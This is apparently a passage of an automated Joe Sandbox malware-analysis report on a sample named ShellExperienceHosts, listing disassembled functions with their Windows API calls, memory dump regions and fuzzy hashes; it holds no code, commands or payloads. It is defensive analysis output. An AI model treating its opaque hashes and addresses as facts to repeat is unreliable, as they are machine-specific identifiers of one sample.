                                                                            • Instruction Fuzzy Hash: A181D631A00215ABDF159F60C998BEE7772BF49318F140179EC25EBB80DF759906CB98
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C70EA2A
                                                                            • SelectObject.GDI32(?,0000E831), ref: 6C70EBF7
                                                                              • Part of subcall function 6C6E2BB1: __EH_prolog3.LIBCMT ref: 6C6E2BB8
                                                                              • Part of subcall function 6C6E2BB1: GetDC.USER32(00000000), ref: 6C6E2BE4
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 6C70EAE8
                                                                            • GetSystemMetrics.USER32(00000000), ref: 6C70EBBC
                                                                              • Part of subcall function 6C70E793: GetTextExtentPoint32W.GDI32(?,0000007D,00000001,00000000), ref: 6C70E7A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3ObjectSelect$ExtentMetricsPoint32SystemText
                                                                            • String ID:
                                                                            • API String ID: 182195805-0
                                                                            • Opcode ID: 50d6c38db57b065413d32dc1d9e32bee73fd8e72fcbafc53d2d0253613edc1f5
                                                                            • Instruction ID: 1e0d73f0e14c66abc1f0b7cc133cb23c9bc894f80a10daa1858b737c1acf9703
                                                                            • Instruction Fuzzy Hash: 987192B0A002099FDB04CF69C988FAEBBF5BF89314F11416DE456AB791DB70D905CB94
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Parent$H_prolog3_Window
                                                                            • String ID:
                                                                            • API String ID: 3354660761-0
                                                                            • Opcode ID: 57d7e1d99eb49b98083f9a8adbb8187aec04c833e04296313e7cd3f2fcf5d1be
                                                                            • Instruction ID: af248951aa601b9c15f85c73a8e3a3a021ca7b6e82d8d9a6abfeaba2aeeb0b9c
                                                                            • Instruction Fuzzy Hash: F351D4317052149BDF159F60C988AED37B3AF49718F180179EC25EBA91DF31C8468769
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Empty$Client
                                                                            • String ID:
                                                                            • API String ID: 1457177775-0
                                                                            • Opcode ID: 09fa670366a9521a4e966493d836c01ef5655532915f4ef5afe1e629688460c3
                                                                            • Instruction ID: cc8de3078dd3cd6eeb41de325d7b0fce987da920fc3d5b2330fe6a9aff030b57
                                                                            • Instruction Fuzzy Hash: 2B612E71B002199FCF04DFA8C998AEDBBB6BF49318F144269E815E7780DB34AD05CB94
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C7C4D3A
                                                                            • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 6C7C4EBF
                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 6C7C4F03
                                                                            • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 6C7C4F35
                                                                              • Part of subcall function 6C6FAC48: __EH_prolog3_GS.LIBCMT ref: 6C6FAC52
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$H_prolog3H_prolog3_
                                                                            • String ID:
                                                                            • API String ID: 1270747201-0
                                                                            • Opcode ID: 64df5ef8904ee392a0036c1830065d53b924da157fe1d95d7f5a36f0575b9879
                                                                            • Instruction ID: 32d6070cc930d2a2d0e719d7cd22e5b0514a28b5c9e125e6a49708338ed8a9bd
                                                                            • Opcode Fuzzy Hash: 64df5ef8904ee392a0036c1830065d53b924da157fe1d95d7f5a36f0575b9879
                                                                            • Instruction Fuzzy Hash: 8D617F35601215DBCF05DF20C998EED3776BF89318F0440B9ED1AAB756CB30A909CBA9
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustPointer
                                                                            • String ID:
                                                                            • API String ID: 1740715915-0
                                                                            • Opcode ID: 2ecedd5ceaf2937ae4366373abe14ac297241fb566547e1bd0f81e8851a8d8e6
                                                                            • Instruction ID: 9d4b56ea71e0d35fb597f4b251101f41927317dc488e8d7090efdc24aa5c913c
                                                                            • Opcode Fuzzy Hash: 2ecedd5ceaf2937ae4366373abe14ac297241fb566547e1bd0f81e8851a8d8e6
                                                                            • Instruction Fuzzy Hash: D4512771605606AFDB398F16C648BAA73A4FF0031CF214EADD91597E90D739E880C790
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 05c3d199acf961cd350fbe80a70cd58fa930699b357473c6f4d375fb978d9222
                                                                            • Instruction ID: ba02511891251a41a2cfb55b9f4c67137237929a4d922ea744ecc0cdef7eb0a0
                                                                            • Opcode Fuzzy Hash: 05c3d199acf961cd350fbe80a70cd58fa930699b357473c6f4d375fb978d9222
                                                                            • Instruction Fuzzy Hash: 1C412771A00318AFD7349F7DCE41BDABBA9EB84715F10897AE1419BF90D770E9048780
                                                                            APIs
                                                                            • FindResourceW.KERNEL32(?,?,00000006,00000000,?,?,?,?,6C6B201F,00000000,?,?), ref: 6C6B4DF4
                                                                            • LoadResource.KERNEL32(?,00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E08
                                                                            • LockResource.KERNEL32(00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E1A
                                                                            • SizeofResource.KERNEL32(?,00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E28
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                            • String ID:
                                                                            • API String ID: 3473537107-0
                                                                            • Opcode ID: 446c7d5166e496d24a1de67f30b51fe3bc65521b6c1c20c7bcf2f4c2600c1cc3
                                                                            • Instruction ID: 21b49e0c6eb575abf5b60e10db7748c191a3d24aee4e98b99e97a9b3bcf1ede8
                                                                            • Opcode Fuzzy Hash: 446c7d5166e496d24a1de67f30b51fe3bc65521b6c1c20c7bcf2f4c2600c1cc3
                                                                            • Instruction Fuzzy Hash: 40313B726012146BD7108E658C84A7B73ACEF86719F158429FD11F7780E7B5D827C3BA
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C70A4B7
                                                                              • Part of subcall function 6C740CD1: __EH_prolog3.LIBCMT ref: 6C740CD8
                                                                              • Part of subcall function 6C740CD1: GetClientRect.USER32(6C8876B0,?), ref: 6C740D27
                                                                            • GetClientRect.USER32(?,?), ref: 6C70A50D
                                                                              • Part of subcall function 6C70C950: GetStockObject.GDI32(00000011), ref: 6C70C95F
                                                                              • Part of subcall function 6C70C950: SelectObject.GDI32(?,?), ref: 6C70C971
                                                                              • Part of subcall function 6C6E2275: SetBkMode.GDI32(?,6C6B1A21), ref: 6C6E2289
                                                                              • Part of subcall function 6C6E2275: SetBkMode.GDI32(?,6C6B1A21), ref: 6C6E229B
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 6C70A5A6
                                                                            • SelectObject.GDI32(00000000,?), ref: 6C70A5DB
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectRect$ClientModeSelect$H_prolog3H_prolog3_InflateStock
                                                                            • String ID:
                                                                            • API String ID: 8310612-0
                                                                            • Opcode ID: 0592f91fd856dceea7676d1f1846a3f6f870266683d1f21a3b27d8e345152555
                                                                            • Instruction ID: 3d7ec5eb5397fcc32c3b3c4b2268a42dd06a502221d276cd4771d3baf0791434
                                                                            • Opcode Fuzzy Hash: 0592f91fd856dceea7676d1f1846a3f6f870266683d1f21a3b27d8e345152555
                                                                            • Instruction Fuzzy Hash: C1415E71A006199FCF01DFA4C988AAD77B6BF4A314F14416DE816BB381CB75A906CF91
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __calloc_crt__init_pointers__mtterm
                                                                            • String ID:
                                                                            • API String ID: 2478854527-0
                                                                            • Opcode ID: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                            • Instruction ID: 5c36862bfe0cc13d8c1639bcb3dda6b95bcd397ab15aa3152d790c78a54cba2f
                                                                            • Opcode Fuzzy Hash: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                            • Instruction Fuzzy Hash: 29316F35D01730EFFB12EB758C98A96BFB4EB48760B24491AF920DA2B1E7308065DF50
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C740CD8
                                                                            • GetClientRect.USER32(6C8876B0,?), ref: 6C740D27
                                                                              • Part of subcall function 6C7394AD: GetScrollPos.USER32(?,6C80DF26), ref: 6C7394D9
                                                                              • Part of subcall function 6C7A311C: GetModuleHandleW.KERNEL32(uxtheme.dll,?,6C740D59,00000001,00000000,?,?,?,00000008,6C6FB3D4,?,?,?,000000C8), ref: 6C7A312B
                                                                              • Part of subcall function 6C7A311C: GetProcAddress.KERNEL32(00000000,BufferedPaintInit), ref: 6C7A313B
                                                                              • Part of subcall function 6C7A311C: EncodePointer.KERNEL32(00000000,?,?,?,00000008,6C6FB3D4,?,?,?,000000C8), ref: 6C7A3144
                                                                            • CreateCompatibleDC.GDI32(?), ref: 6C740DC3
                                                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C740DE9
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CompatibleCreate$AddressBitmapClientEncodeH_prolog3HandleModulePointerProcRectScroll
                                                                            • String ID:
                                                                            • API String ID: 1015973060-0
                                                                            • Opcode ID: 71681594c81cd3e72155e81c26046f6996178641df0914205c3102f9a83d9b8c
                                                                            • Instruction ID: 03e67e94c9447b962403b5373c19aec759004e18596507285865ac3a72eed054
                                                                            • Opcode Fuzzy Hash: 71681594c81cd3e72155e81c26046f6996178641df0914205c3102f9a83d9b8c
                                                                            • Instruction Fuzzy Hash: D24170B1601606EFDB40DF69CA88A99BBF4BF19318B00C52DD41887B51DB30E869CFD4
                                                                            APIs
                                                                            • SetRectEmpty.USER32(?), ref: 6C708D13
                                                                            • RedrawWindow.USER32(?,?,00000000,00000105), ref: 6C708D28
                                                                            • IsRectEmpty.USER32(?), ref: 6C708D80
                                                                            • RedrawWindow.USER32(?,?,00000000,00000105), ref: 6C708DAC
                                                                              • Part of subcall function 6C707D12: RedrawWindow.USER32(00000000,?,00000000,00000105), ref: 6C707D86
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: RedrawWindow$EmptyRect
                                                                            • String ID:
                                                                            • API String ID: 138230908-0
                                                                            • Opcode ID: f6f7a6a44956b34032cac44703d378b51e09248af3a33a4abec867b5318ecf69
                                                                            • Instruction ID: d78357208bda5f28f6d008b6c9b3a67b1e548328b70fdfe014319225dcb8aa5c
                                                                            • Opcode Fuzzy Hash: f6f7a6a44956b34032cac44703d378b51e09248af3a33a4abec867b5318ecf69
                                                                            • Instruction Fuzzy Hash: AA414DB5B01615DBDB01CFA4CA89AEEB7F5BF09309F14417AED05AB240C771AA45CF90
                                                                            APIs
                                                                              • Part of subcall function 6C7708FD: GetWindowLongW.USER32(?,000000F0), ref: 6C77090A
                                                                            • GetClientRect.USER32(?,?), ref: 6C73C8B8
                                                                            • IsMenu.USER32(00000000), ref: 6C73C8F4
                                                                            • AdjustWindowRectEx.USER32(?,00000000,00000000,?), ref: 6C73C90C
                                                                            • GetClientRect.USER32(?,?), ref: 6C73C954
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$ClientWindow$AdjustLongMenu
                                                                            • String ID:
                                                                            • API String ID: 3435883281-0
                                                                            • Opcode ID: 226dae429a5e6f6330d0a463c935a7a2f26c9898c854e5d2dac39a7d9a5ae908
                                                                            • Instruction ID: b26bc02d8a801dfb331c612b530afd6629ae77bd5e1de6aff9a4de2ec61d37e5
                                                                            • Opcode Fuzzy Hash: 226dae429a5e6f6330d0a463c935a7a2f26c9898c854e5d2dac39a7d9a5ae908
                                                                            • Instruction Fuzzy Hash: CD31A371F00359AFDF10DBB5CA4CEBEBBB9AF45208F144229E805A3740DB30A940CBA0
                                                                            APIs
                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0223E430
                                                                            • __isleadbyte_l.LIBCMT ref: 0223E463
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,0223701E,?,00000000,00000000,?,?,?,?,0223701E,00000000), ref: 0223E494
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,0223701E,00000001,00000000,00000000,?,?,?,?,0223701E,00000000), ref: 0223E502
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                            • String ID:
                                                                            • API String ID: 3058430110-0
                                                                            • Opcode ID: 7b64836bf0203443f1c00f9e4ad279cabdfb7da6de54c7dc67062b5fa7cbaf21
                                                                            • Instruction ID: c8ad02f424584062f346f7731c6f2c29392acd4b597ea2c25db4bda3c7c74c93
                                                                            • Opcode Fuzzy Hash: 7b64836bf0203443f1c00f9e4ad279cabdfb7da6de54c7dc67062b5fa7cbaf21
                                                                            • Instruction Fuzzy Hash: 3A31F5B0A20256EFDB22DFE4C8809793BA5FF0C330B0685A8E6658B195E330D944DB51
                                                                            APIs
                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000E459
                                                                            • __isleadbyte_l.LIBCMT ref: 1000E48C
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 1000E4BD
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 1000E52B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                            • String ID:
                                                                            • API String ID: 3058430110-0
                                                                            • Opcode ID: faff6b0e24b146ed5f76b5f803dc00f384076012b6a75b333959b6e0697892ea
                                                                            • Instruction ID: 678bb179593d23e830fa626ca8f93fbb1acc7737e5ff7f739f33e090e4c13c79
                                                                            • Opcode Fuzzy Hash: faff6b0e24b146ed5f76b5f803dc00f384076012b6a75b333959b6e0697892ea
                                                                            • Instruction Fuzzy Hash: 9731AE71A042D6EFEB10CFA4C884AAD3BE6EF013D1B1585A9E4A4AB099D730DD40DB51
                                                                            APIs
                                                                            • timeGetTime.WINMM ref: 02234425
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02234434
                                                                            • WaitForSingleObject.KERNEL32(?,00001770), ref: 02234482
                                                                              • Part of subcall function 02233F37: GetCurrentThreadId.KERNEL32 ref: 02233F3C
                                                                              • Part of subcall function 02233F37: send.WS2_32(?,10017440,00000010,00000000), ref: 02233F9D
                                                                              • Part of subcall function 02233F37: SetEvent.KERNEL32(?), ref: 02233FC0
                                                                              • Part of subcall function 02233F37: InterlockedExchange.KERNEL32(?,00000000), ref: 02233FCC
                                                                              • Part of subcall function 02233F37: WSACloseEvent.WS2_32(?), ref: 02233FDA
                                                                              • Part of subcall function 02233F37: shutdown.WS2_32(?,00000001), ref: 02233FF2
                                                                              • Part of subcall function 02233F37: closesocket.WS2_32(?), ref: 02233FFC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: EventExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                            • String ID:
                                                                            • API String ID: 4080316033-0
                                                                            • Opcode ID: cd026b78566f857b09982a36d15b79aaae0893a0b763f0313fae0352c7133491
                                                                            • Instruction ID: 262de210ee43d1675c91c1c07ebcac3eddaf52da196b4fb5c1c0dc0df4b2c1b4
                                                                            • Opcode Fuzzy Hash: cd026b78566f857b09982a36d15b79aaae0893a0b763f0313fae0352c7133491
                                                                            • Instruction Fuzzy Hash: BC2164B6610704ABD621EFB9DC84B97B3E8EF89721F00465EF689C7650D671E404CBA0
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,-00000001,00000000,00000000,?,?,6C6CD038,?), ref: 6C6CC8E3
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?,?,?,?,?,?,?,6C6CD038,?), ref: 6C6CC94A
                                                                            • WideCharToMultiByte.KERNEL32 ref: 6C6CC97B
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,000000FF,000000FF,00000000,00000000,00000000,00000000), ref: 6C6CC9AF
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 626452242-0
                                                                            • Opcode ID: 6905df19c1b72166ec66d7fbc43360ca5e1050a5545607cfdd16699a1cd98d04
                                                                            • Instruction ID: 2a34b93a180a5f05f375a756163619480df12c8426e4ea5a9cca7bb297ce7a4f
                                                                            • Opcode Fuzzy Hash: 6905df19c1b72166ec66d7fbc43360ca5e1050a5545607cfdd16699a1cd98d04
                                                                            • Instruction Fuzzy Hash: ED21D4B15082047FE710AF658C88CABBBF8EF86368F05492DF49987250E631DD04CBA3
                                                                            APIs
                                                                            • FindResourceW.KERNEL32(?,?,00000006,00000000,?,?,?,?,6C6B201F,00000000,?,?), ref: 6C6B4DF4
                                                                            • LoadResource.KERNEL32(?,00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E08
                                                                            • LockResource.KERNEL32(00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E1A
                                                                            • SizeofResource.KERNEL32(?,00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E28
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
